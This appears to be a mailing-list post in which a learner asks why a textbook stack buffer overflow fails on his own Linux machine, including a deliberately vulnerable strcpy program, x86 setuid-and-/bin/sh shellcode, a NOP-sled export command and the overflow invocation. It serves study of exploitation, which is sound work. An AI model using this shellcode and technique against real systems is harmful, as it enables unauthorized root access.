Stack Confusion with Buffer Overflow



Hello,

at the moment I read a book called "Forbitten Code". In this books are
examples but they never work for me, although I'm sure that I understood
everything.
I want to describe the example. It is about getting root permissions on
the own computer with help of a buffer overflow.
First of all there is the vulnerable program:

#include <string.h>

int main(int argc, char **argv) {

char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}

Then I saved the shellcode to a variable SHELLCODE, I got from the book.
The shellcode looks like this:

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c
\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

It is described that x90 is the "No Operation"-instruction. "shellcode"
contains 46 hex-numbers, which also includes /bin/sh as you can see below:

export SHELLCODE=`perl -e 'print "\x90"x200;'``cat shellcode`

Then I looked into the stack:

0xbfd13510: "HOSTNAME=gentoo"
0xbfd13520: "SHELLCODE=", '\220' <repeats 190 times>...
0xbfd135e8:
"\220\220\220\220\220\220\220\220\220\2201À°F1Û1ÉÍ\200ë\026[1À\210C\a\211[\b\211C\f°\v\215K\b\215S\fÍ\200èåÿÿÿ/bin/sh"
0xbfd13621: "SHELL=/bin/bash"

Because the address 0xbfd13520 contains the string "SHELLCODE", I have
to choose a later address to get to the code, so I chose at least
0xbfd13530.
Now I can use these address as the jump-back-address for the buffer
overflow. I have to assign the hex-numbers with the little endian order
because my processor is an Intel. (btw, I also tried a 100-times loop below)

../vuln `perl -e 'print "\x30\x35\xd1\bf"x10;'`

When I start vuln with the parameters, I just get a SEGMENTATION FAULT
instead of root-rights.
First I thought that the shellcode could be wrong but in an earlier
example I managed it to get root-privileges, but _only_ once.
Can anybody imagine where this example fails?

Thanks,
Markus
.